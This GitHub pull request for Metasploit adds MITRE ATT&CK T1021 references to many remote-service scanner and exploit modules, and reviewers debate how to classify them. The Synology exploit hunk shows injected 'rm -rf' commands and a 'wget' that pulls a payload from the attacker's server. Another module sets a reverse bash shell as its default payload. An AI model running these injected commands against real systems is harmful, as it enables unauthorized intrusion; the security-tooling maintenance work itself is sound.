Skip to content

Add T1021 "Remote Services" MITRE technique and sub-technique references #20560

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 2 commits into
base: master
Choose a base branch
from
Open

Add T1021 "Remote Services" MITRE technique and sub-technique references #20560

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
0a755ea
Add references to MITRE ATT&CK T1021 - Remote Services
cdelafuente-r7 Sep 22, 2025
3b727fb
Code review
cdelafuente-r7 Oct 14, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
1 change: 1 addition & 0 deletions modules/auxiliary/admin/smb/change_password.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -26,6 +26,7 @@ def initialize(info = {})
],
'References' => [
['URL', 'https://github.com/fortra/impacket/blob/master/examples/changepasswd.py'],
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
Expand Down
1 change: 1 addition & 0 deletions modules/auxiliary/admin/smb/check_dir_file.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -31,6 +31,7 @@ def initialize
'j0hn__f'
],
'References' => [
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
],
'License' => MSF_LICENSE,
'Notes' => {
Expand Down
3 changes: 3 additions & 0 deletions modules/auxiliary/admin/smb/delete_file.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -30,6 +30,9 @@ def initialize
'mubix' # copied from hdm upload_file module
],
'License' => MSF_LICENSE,
'References' => [
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
],
'Notes' => {
'Stability' => [OS_RESOURCE_LOSS],
'SideEffects' => [],
Expand Down
5 changes: 4 additions & 1 deletion modules/auxiliary/admin/smb/download_file.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -29,7 +29,10 @@ def initialize
'Stability' => [CRASH_SAFE],
'SideEffects' => [],
'Reliability' => []
}
},
'References' => [
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
]
)

register_options([
Expand Down
1 change: 1 addition & 0 deletions modules/auxiliary/admin/smb/list_directory.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -27,6 +27,7 @@ def initialize
'hdm'
],
'References' => [
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
],
'License' => MSF_LICENSE,
'Notes' => {
Expand Down
1 change: 1 addition & 0 deletions modules/auxiliary/admin/smb/ms17_010_command.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -41,6 +41,7 @@ def initialize(info = {})
[ 'URL', 'https://github.com/worawit/MS17-010' ],
[ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],
[ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],
],
'DisclosureDate' => '2017-03-14',
'Notes' => {
Expand Down
3 changes: 2 additions & 1 deletion modules/auxiliary/admin/smb/psexec_ntdsgrab.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -35,7 +35,8 @@ def initialize(info = {})
'References' => [
[ 'URL', 'http://sourceforge.net/projects/smbexec' ],
[ 'URL', 'https://www.optiv.com/blog/owning-computers-without-shell-access' ],
[ 'ATT&CK', Mitre::Attack::Technique::T1003_003_NTDS ]
[ 'ATT&CK', Mitre::Attack::Technique::T1003_003_NTDS ],
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
Expand Down
3 changes: 2 additions & 1 deletion modules/auxiliary/admin/smb/samba_symlink_traversal.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -29,7 +29,8 @@ def initialize
'References' => [
['CVE', '2010-0926'],
['OSVDB', '62145'],
['URL', 'http://www.samba.org/samba/news/symlink_attack.html']
['URL', 'http://www.samba.org/samba/news/symlink_attack.html'],
['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
],
'License' => MSF_LICENSE,
'Notes' => {
Expand Down
1 change: 1 addition & 0 deletions modules/auxiliary/admin/smb/upload_file.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -26,6 +26,7 @@ def initialize
'hdm' # metasploit module
],
'References' => [
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
],
'License' => MSF_LICENSE,
'Notes' => {
Expand Down
3 changes: 2 additions & 1 deletion modules/auxiliary/admin/smb/webexec_command.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -30,7 +30,8 @@ def initialize(info = {})
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://webexec.org'],
['CVE', '2018-15442']
['CVE', '2018-15442'],
['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
Expand Down
1 change: 1 addition & 0 deletions modules/auxiliary/admin/vnc/realvnc_41_bypass.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -29,6 +29,7 @@ def initialize(info = {})
['OSVDB', '25479'],
['URL', 'https://web.archive.org/web/20080102163013/http://secunia.com/advisories/20107/'],
['CVE', '2006-2369'],
['ATT&CK', Mitre::Attack::Technique::T1021_005_VNC],
],
'DisclosureDate' => '2006-05-15',
'Notes' => {
Expand Down
1 change: 1 addition & 0 deletions modules/auxiliary/scanner/smb/smb_login.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -43,6 +43,7 @@ def initialize
],
'References' => [
[ 'CVE', '1999-0506'], # Weak password
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],
],
'License' => MSF_LICENSE,
'DefaultOptions' => {
Expand Down
3 changes: 2 additions & 1 deletion modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -33,7 +33,8 @@ def initialize(info = {})
['CVE', '2018-16158'],
['EDB', '45283'],
['URL', 'https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'],
['URL', 'https://www.ctrlu.net/vuln/0006.html']
['URL', 'https://www.ctrlu.net/vuln/0006.html'],
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
],
'DisclosureDate' => '2018-07-18',
'License' => MSF_LICENSE,
Expand Down
3 changes: 2 additions & 1 deletion modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -29,7 +29,8 @@ def initialize(info = {})
['EDB', '39224'],
['PACKETSTORM', '135225'],
['URL', 'https://seclists.org/fulldisclosure/2016/Jan/26'],
['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios']
['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios'],
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
],
'DisclosureDate' => '2016-01-09',
'License' => MSF_LICENSE,
Expand Down
3 changes: 2 additions & 1 deletion modules/auxiliary/scanner/ssh/juniper_backdoor.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -26,7 +26,8 @@ def initialize(info = {})
'References' => [
['CVE', '2015-7755'],
['URL', 'https://www.rapid7.com/blog/post/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor/'],
['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713']
['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713'],
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
],
'DisclosureDate' => '2015-12-20',
'License' => MSF_LICENSE,
Expand Down
3 changes: 2 additions & 1 deletion modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -36,7 +36,8 @@ def initialize(info = {})
],
'References' => [
['CVE', '2018-10933'],
['URL', 'https://www.libssh.org/security/advisories/CVE-2018-10933.txt']
['URL', 'https://www.libssh.org/security/advisories/CVE-2018-10933.txt'],
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
],
'DisclosureDate' => '2018-10-16',
'License' => MSF_LICENSE,
Expand Down
5 changes: 4 additions & 1 deletion modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -22,7 +22,10 @@ def initialize(info = {})
'Author' => ['Wyatt Dahlenburg (@wdahlenb)'],
'Platform' => ['linux'],
'SessionTypes' => ['shell', 'meterpreter'],
'References' => [['URL', 'https://docs.github.com/en/authentication/connecting-to-github-with-ssh/testing-your-ssh-connection']],
'References' => [
['URL', 'https://docs.github.com/en/authentication/connecting-to-github-with-ssh/testing-your-ssh-connection'],
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
],
'Notes' => {
'Reliability' => UNKNOWN_RELIABILITY,
'Stability' => UNKNOWN_STABILITY,
Expand Down
3 changes: 2 additions & 1 deletion modules/auxiliary/scanner/ssh/ssh_login.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -28,7 +28,8 @@ def initialize
},
'Author' => ['todb'],
'References' => [
[ 'CVE', '1999-0502'] # Weak password
[ 'CVE', '1999-0502'], # Weak password
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
],
'License' => MSF_LICENSE,
'DefaultOptions' => { 'VERBOSE' => false } # Disable annoying connect errors
Expand Down
5 changes: 4 additions & 1 deletion modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -35,7 +35,10 @@ def initialize
be shared between subject keys or only belong to a single one.
},
'Author' => ['todb', 'RageLtMan'],
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'References' => [
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
]
)

register_options(
Expand Down
3 changes: 2 additions & 1 deletion modules/auxiliary/scanner/telnet/telnet_login.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -26,7 +26,8 @@ def initialize
},
'Author' => 'egypt',
'References' => [
[ 'CVE', '1999-0502'] # Weak password
[ 'CVE', '1999-0502'], # Weak password
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
],
'License' => MSF_LICENSE
)
Expand Down
3 changes: 2 additions & 1 deletion modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -21,7 +21,8 @@ def initialize(info = {})
'References' => [
[ 'CVE', '2012-1803' ],
[ 'EDB', '18779' ],
[ 'US-CERT-VU', '889195' ]
[ 'US-CERT-VU', '889195' ],
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
],
'Author' => [
'Borja Merino <bmerinofe[at]gmail.com>',
Expand Down
3 changes: 2 additions & 1 deletion modules/auxiliary/scanner/vnc/ard_root_pw.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -14,7 +14,8 @@ def initialize
'Description' => 'Enable and set root account to a chosen password on unpatched macOS High Sierra hosts with either Screen Sharing or Remote Management enabled.',
'References' => [
['CVE', '2017-13872'],
['URL', 'https://support.apple.com/en-us/HT208315']
['URL', 'https://support.apple.com/en-us/HT208315'],
['ATT&CK', Mitre::Attack::Technique::T1021_005_VNC]
],
'Author' => 'jgor',
'License' => MSF_LICENSE
Expand Down
3 changes: 2 additions & 1 deletion modules/auxiliary/scanner/vnc/vnc_login.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -26,7 +26,8 @@ def initialize
'jduck'
],
'References' => [
[ 'CVE', '1999-0506'] # Weak password
[ 'CVE', '1999-0506'], # Weak password
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
],
'License' => MSF_LICENSE
)
Expand Down
5 changes: 4 additions & 1 deletion modules/auxiliary/scanner/winrm/winrm_cmd.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -17,7 +17,10 @@ def initialize
This module runs arbitrary Windows commands using the WinRM Service
},
'Author' => [ 'thelightcosine' ],
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'References' => [
[ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ]
]
)

register_options(
Expand Down
3 changes: 2 additions & 1 deletion modules/auxiliary/scanner/winrm/winrm_login.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -30,7 +30,8 @@ module without SSL, the 'AllowUnencrypted' winrm option must be set.
},
'Author' => [ 'thelightcosine', 'smashery' ],
'References' => [
[ 'CVE', '1999-0502'] # Weak password
[ 'CVE', '1999-0502'], # Weak password
[ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ]
],
'License' => MSF_LICENSE
)
Expand Down
5 changes: 4 additions & 1 deletion modules/auxiliary/scanner/winrm/winrm_wql.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -19,7 +19,10 @@ def initialize
winrm option must be set.
},
'Author' => [ 'thelightcosine' ],
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'References' => [
[ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ]
]
)

register_options(
Expand Down
3 changes: 2 additions & 1 deletion modules/exploits/apple_ios/ssh/cydia_default_ssh.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -26,7 +26,8 @@ def initialize(info = {})
'hdm'
],
'References' => [
['OSVDB', '61284']
['OSVDB', '61284'],
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
],
'DefaultOptions' => {
'EXITFUNC' => 'thread'
Expand Down
3 changes: 2 additions & 1 deletion modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -42,7 +42,8 @@ def initialize(info = {})
'References' => [
['CVE', '2023-45249'],
['URL', 'https://security-advisory.acronis.com/advisories/SEC-6452'],
['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249']
['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249'],
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
],
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
Expand Down
3 changes: 2 additions & 1 deletion modules/exploits/linux/http/asuswrt_lan_rce.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -33,7 +33,8 @@ def initialize(info = {})
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'],
['URL', 'https://seclists.org/fulldisclosure/2018/Jan/78'],
['CVE', '2018-5999'],
['CVE', '2018-6000']
['CVE', '2018-6000'],
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This module does not use an account; it uses a special POST requesto to place the router in command mode, then sends a UDP packet instructing the router to start a telnet server serving bash.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

That's a valid point, and it brings up a good question about our classification methodology. Given that the module's ultimate goal is to establish a Telnet service for RCE, should we classify it as a 'Remote Service' attack based on the outcome and workflow, rather than solely on the initial point of entry?

],
'Targets' => [
[
Expand Down
3 changes: 2 additions & 1 deletion modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -29,7 +29,8 @@ def initialize(info = {})
['CVE', '2025-1094'], # The SQL injection in PostgreSQL code.
['URL', 'http://web.archive.org/web/20241226144006/https://www.beyondtrust.com/trust-center/security-advisories/bt24-10'], # BeyondTrust Advisory
['URL', 'https://www.postgresql.org/support/security/CVE-2025-1094/'], # PostgreSQL Advisory
['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'] # Rapid7 Analysis
['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'], # Rapid7 Analysis
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I do not see anywhere in this module where we are using an authenticated account?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Should we restrict the Remote Service attack to services with authenticated accounts?

It looks like this module exploits an unauthenticated remote code execution vulnerability in a remote service (BeyondTrust PRA/RS) using a WebSocket connection. I'm inclined to say it aligns with T1021, as it exploits a vulnerability in a remote support service to gain remote code execution.

],
'DisclosureDate' => '2024-12-16',
'Platform' => [ 'linux', 'unix' ],
Expand Down
3 changes: 2 additions & 1 deletion modules/exploits/linux/http/f5_icontrol_exec.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -24,7 +24,8 @@ def initialize(info = {})
],
'References' => [
['CVE', '2014-2928'],
['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html']
['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html'],
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
Expand Down
5 changes: 4 additions & 1 deletion modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -53,7 +53,8 @@ module does not presently support exploiting these targets.
],
'References' => [
['CVE', '2019-15949'],
['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'] # original PHP exploit
['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'], # original PHP exploit
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
],
'Payload' => { 'BadChars' => "\x00" },
'Targets' => [
Expand All @@ -77,7 +78,9 @@ module does not presently support exploiting these targets.
'Platform' => 'unix',
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
'Payload' => {
# rubocop:disable Lint/DetectMetadataTrailingLeadingWhitespace
'Append' => ' & disown', # the payload must be disowned after execution, otherwise cleanup fails
# rubocop:enable Lint/DetectMetadataTrailingLeadingWhitespace
'BadChars' => '"'
}
}
Expand Down
3 changes: 2 additions & 1 deletion modules/exploits/linux/http/supervisor_xmlrpc_exec.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -29,7 +29,8 @@ def initialize(info = {})
['URL', 'https://github.com/Supervisor/supervisor/issues/964'],
['URL', 'https://www.debian.org/security/2017/dsa-3942'],
['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'],
['CVE', '2017-11610']
['CVE', '2017-11610'],
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
],
'Platform' => 'linux',
'Targets' => [
Expand Down
11 changes: 6 additions & 5 deletions modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -39,7 +39,8 @@ def initialize(info = {})
[ 'CVE', '2017-15889' ],
[ 'EDB', '43190' ],
[ 'URL', 'https://ssd-disclosure.com/ssd-advisory-synology-storagemanager-smart-cgi-remote-command-execution/' ],
[ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ]
[ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ],
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
],
'Privileged' => true,
'Stance' => Msf::Exploit::Stance::Aggressive,
Expand Down Expand Up @@ -179,20 +180,20 @@ def exploit
})

print_status('Cleaning env')
inject_request(cookie, token, cmd = 'rm -rf /a')
inject_request(cookie, token, cmd = 'rm -rf b')
inject_request(cookie, token, 'rm -rf /a')
inject_request(cookie, token, 'rm -rf b')
Comment on lines +183 to +184
Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Rubocop was not happy with this...

command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//)
command_space = 22 - "echo -n ''>>/a".length
command_space -= 1
command.each_slice(command_space) do |a|
a = a.join('')
vprint_status("Staging wget with: echo -n '#{a}'>>/a")
inject_request(cookie, token, cmd = "echo -n '#{a}'>>/a")
inject_request(cookie, token, "echo -n '#{a}'>>/a")
end
print_status('Requesting payload pull')
register_file_for_cleanup('/usr/syno/synoman/webman/modules/StorageManager/b')
register_file_for_cleanup('/a')
inject_request(cookie, token, cmd = 'wget -i /a -O b')
inject_request(cookie, token, 'wget -i /a -O b')
# at this point we let the HTTP server call the last stage
# wfsdelay should be long enough to hold out for everything to download and run
rescue ::Rex::ConnectionError
Expand Down
3 changes: 2 additions & 1 deletion modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -36,7 +36,8 @@ def initialize(info = {})
},
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'References' => [
[ 'CVE', '2013-2578']
[ 'CVE', '2013-2578'],
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
],
'Targets' => [
[ 'Automatic', {} ],
Expand Down
3 changes: 2 additions & 1 deletion modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -31,7 +31,8 @@ def initialize(info = {})
'References' => [
['CVE', '2025-24016'],
['URL', 'https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh'],
['URL', 'https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016']
['URL', 'https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016'],
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
],
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
Expand Down
Loading
Loading